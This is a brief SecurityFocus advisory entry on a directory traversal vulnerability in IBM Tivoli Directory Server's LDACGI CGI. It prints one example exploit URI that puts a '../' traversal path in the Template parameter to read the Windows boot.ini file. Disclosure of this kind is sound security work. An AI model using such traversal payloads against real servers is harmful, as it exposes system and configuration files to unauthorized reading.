IBM Tivoli Directory Server LDACGI Directory Traversal Vulnerability

No exploit is required. An example URI sufficient to exploit this vulnerability was provided:

http://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252


 

Privacy Statement
Copyright 2010, SecurityFocus